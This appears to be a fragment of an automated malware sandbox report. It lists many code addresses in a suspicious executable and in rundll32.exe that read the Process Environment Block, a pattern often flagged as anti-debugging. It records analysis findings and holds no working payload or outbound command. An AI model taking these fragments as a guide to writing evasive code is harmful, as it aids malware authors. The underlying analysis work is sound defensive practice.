Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A04F2E mov eax, dword ptr fs:[00000030h] 1_2_00A04F2E
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3E730 mov eax, dword ptr fs:[00000030h] 1_2_00A3E730
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h] 1_2_00AD070D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD070D mov eax, dword ptr fs:[00000030h] 1_2_00AD070D
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h] 1_2_00A3A70E
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A3A70E mov eax, dword ptr fs:[00000030h] 1_2_00A3A70E
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A2F716 mov eax, dword ptr fs:[00000030h] 1_2_00A2F716
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A9FF10
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A9FF10 mov eax, dword ptr fs:[00000030h] 1_2_00A9FF10
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1FF60 mov eax, dword ptr fs:[00000030h] 1_2_00A1FF60
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00AD8F6A mov eax, dword ptr fs:[00000030h] 1_2_00AD8F6A
Source: C:\Users\user\Desktop\NdBLyH2h5d.exe Code function: 1_2_00A1EF40 mov eax, dword ptr fs:[00000030h] 1_2_00A1EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462746D mov eax, dword ptr fs:[00000030h] 6_2_0462746D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A44B mov eax, dword ptr fs:[00000030h] 6_2_0463A44B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h] 6_2_0469C450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469C450 mov eax, dword ptr fs:[00000030h] 6_2_0469C450
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463BC2C mov eax, dword ptr fs:[00000030h] 6_2_0463BC2C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D740D mov eax, dword ptr fs:[00000030h] 6_2_046D740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D740D mov eax, dword ptr fs:[00000030h] 6_2_046D740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D740D mov eax, dword ptr fs:[00000030h] 6_2_046D740D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686C0A mov eax, dword ptr fs:[00000030h] 6_2_04686C0A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1C06 mov eax, dword ptr fs:[00000030h] 6_2_046C1C06
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C14FB mov eax, dword ptr fs:[00000030h] 6_2_046C14FB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h] 6_2_04686CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h] 6_2_04686CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686CF0 mov eax, dword ptr fs:[00000030h] 6_2_04686CF0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8CD6 mov eax, dword ptr fs:[00000030h] 6_2_046D8CD6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461849B mov eax, dword ptr fs:[00000030h] 6_2_0461849B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h] 6_2_0462C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462C577 mov eax, dword ptr fs:[00000030h] 6_2_0462C577
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04643D43 mov eax, dword ptr fs:[00000030h] 6_2_04643D43
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683540 mov eax, dword ptr fs:[00000030h] 6_2_04683540
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04627D50 mov eax, dword ptr fs:[00000030h] 6_2_04627D50
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460AD30 mov eax, dword ptr fs:[00000030h] 6_2_0460AD30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04613D34 mov eax, dword ptr fs:[00000030h] 6_2_04613D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CE539 mov eax, dword ptr fs:[00000030h] 6_2_046CE539
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h] 6_2_04634D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h] 6_2_04634D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04634D3B mov eax, dword ptr fs:[00000030h] 6_2_04634D3B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8D34 mov eax, dword ptr fs:[00000030h] 6_2_046D8D34
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0468A537 mov eax, dword ptr fs:[00000030h] 6_2_0468A537
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0461D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461D5E0 mov eax, dword ptr fs:[00000030h] 6_2_0461D5E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CFDE2 mov eax, dword ptr fs:[00000030h] 6_2_046CFDE2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046B8DF1 mov eax, dword ptr fs:[00000030h] 6_2_046B8DF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov ecx, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04686DC9 mov eax, dword ptr fs:[00000030h] 6_2_04686DC9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h] 6_2_046D05AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D05AC mov eax, dword ptr fs:[00000030h] 6_2_046D05AC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046335A1 mov eax, dword ptr fs:[00000030h] 6_2_046335A1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h] 6_2_04631DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h] 6_2_04631DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04631DB5 mov eax, dword ptr fs:[00000030h] 6_2_04631DB5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632581 mov eax, dword ptr fs:[00000030h] 6_2_04632581
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04602D8A mov eax, dword ptr fs:[00000030h] 6_2_04602D8A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h] 6_2_0463FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463FD9B mov eax, dword ptr fs:[00000030h] 6_2_0463FD9B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461766D mov eax, dword ptr fs:[00000030h] 6_2_0461766D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462AE73 mov eax, dword ptr fs:[00000030h] 6_2_0462AE73
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04617E41 mov eax, dword ptr fs:[00000030h] 6_2_04617E41
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h] 6_2_046CAE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046CAE44 mov eax, dword ptr fs:[00000030h] 6_2_046CAE44
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460E620 mov eax, dword ptr fs:[00000030h] 6_2_0460E620
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BFE3F mov eax, dword ptr fs:[00000030h] 6_2_046BFE3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h] 6_2_0460C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h] 6_2_0460C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C600 mov eax, dword ptr fs:[00000030h] 6_2_0460C600
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04638E00 mov eax, dword ptr fs:[00000030h] 6_2_04638E00
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C1608 mov eax, dword ptr fs:[00000030h] 6_2_046C1608
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h] 6_2_0463A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A61C mov eax, dword ptr fs:[00000030h] 6_2_0463A61C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046316E0 mov ecx, dword ptr fs:[00000030h] 6_2_046316E0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046176E2 mov eax, dword ptr fs:[00000030h] 6_2_046176E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04648EC7 mov eax, dword ptr fs:[00000030h] 6_2_04648EC7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BFEC0 mov eax, dword ptr fs:[00000030h] 6_2_046BFEC0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046336CC mov eax, dword ptr fs:[00000030h] 6_2_046336CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8ED6 mov eax, dword ptr fs:[00000030h] 6_2_046D8ED6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 6_2_046D0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 6_2_046D0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D0EA5 mov eax, dword ptr fs:[00000030h] 6_2_046D0EA5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046846A7 mov eax, dword ptr fs:[00000030h] 6_2_046846A7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FE87 mov eax, dword ptr fs:[00000030h] 6_2_0469FE87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461FF60 mov eax, dword ptr fs:[00000030h] 6_2_0461FF60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D8F6A mov eax, dword ptr fs:[00000030h] 6_2_046D8F6A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461EF40 mov eax, dword ptr fs:[00000030h] 6_2_0461EF40
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h] 6_2_04604F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04604F2E mov eax, dword ptr fs:[00000030h] 6_2_04604F2E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463E730 mov eax, dword ptr fs:[00000030h] 6_2_0463E730
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D070D mov eax, dword ptr fs:[00000030h] 6_2_046D070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D070D mov eax, dword ptr fs:[00000030h] 6_2_046D070D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h] 6_2_0463A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A70E mov eax, dword ptr fs:[00000030h] 6_2_0463A70E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462F716 mov eax, dword ptr fs:[00000030h] 6_2_0462F716
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h] 6_2_0469FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469FF10 mov eax, dword ptr fs:[00000030h] 6_2_0469FF10
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046437F5 mov eax, dword ptr fs:[00000030h] 6_2_046437F5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04618794 mov eax, dword ptr fs:[00000030h] 6_2_04618794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h] 6_2_04687794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h] 6_2_04687794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687794 mov eax, dword ptr fs:[00000030h] 6_2_04687794
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D1074 mov eax, dword ptr fs:[00000030h] 6_2_046D1074
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046C2073 mov eax, dword ptr fs:[00000030h] 6_2_046C2073
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04620050 mov eax, dword ptr fs:[00000030h] 6_2_04620050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04620050 mov eax, dword ptr fs:[00000030h] 6_2_04620050
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0461B02A mov eax, dword ptr fs:[00000030h] 6_2_0461B02A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463002D mov eax, dword ptr fs:[00000030h] 6_2_0463002D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h] 6_2_046D4015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046D4015 mov eax, dword ptr fs:[00000030h] 6_2_046D4015
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h] 6_2_04687016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h] 6_2_04687016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04687016 mov eax, dword ptr fs:[00000030h] 6_2_04687016
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046058EC mov eax, dword ptr fs:[00000030h] 6_2_046058EC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov ecx, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0469B8D0 mov eax, dword ptr fs:[00000030h] 6_2_0469B8D0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046320A0 mov eax, dword ptr fs:[00000030h] 6_2_046320A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046490AF mov eax, dword ptr fs:[00000030h] 6_2_046490AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov ecx, dword ptr fs:[00000030h] 6_2_0463F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h] 6_2_0463F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463F0BF mov eax, dword ptr fs:[00000030h] 6_2_0463F0BF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609080 mov eax, dword ptr fs:[00000030h] 6_2_04609080
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683884 mov eax, dword ptr fs:[00000030h] 6_2_04683884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04683884 mov eax, dword ptr fs:[00000030h] 6_2_04683884
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460C962 mov eax, dword ptr fs:[00000030h] 6_2_0460C962
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h] 6_2_0460B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B171 mov eax, dword ptr fs:[00000030h] 6_2_0460B171
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h] 6_2_0462B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462B944 mov eax, dword ptr fs:[00000030h] 6_2_0462B944
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov eax, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04624120 mov ecx, dword ptr fs:[00000030h] 6_2_04624120
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463513A mov eax, dword ptr fs:[00000030h] 6_2_0463513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463513A mov eax, dword ptr fs:[00000030h] 6_2_0463513A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h] 6_2_04609100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h] 6_2_04609100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04609100 mov eax, dword ptr fs:[00000030h] 6_2_04609100
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046941E8 mov eax, dword ptr fs:[00000030h] 6_2_046941E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0460B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0460B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0460B1E1 mov eax, dword ptr fs:[00000030h] 6_2_0460B1E1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h] 6_2_046361A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046361A0 mov eax, dword ptr fs:[00000030h] 6_2_046361A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046869A6 mov eax, dword ptr fs:[00000030h] 6_2_046869A6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046851BE mov eax, dword ptr fs:[00000030h] 6_2_046851BE
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0462C182 mov eax, dword ptr fs:[00000030h] 6_2_0462C182
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_0463A185 mov eax, dword ptr fs:[00000030h] 6_2_0463A185
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_04632990 mov eax, dword ptr fs:[00000030h] 6_2_04632990
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h] 6_2_046BB260
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 6_2_046BB260 mov eax, dword ptr fs:[00000030h] 6_2_046BB260
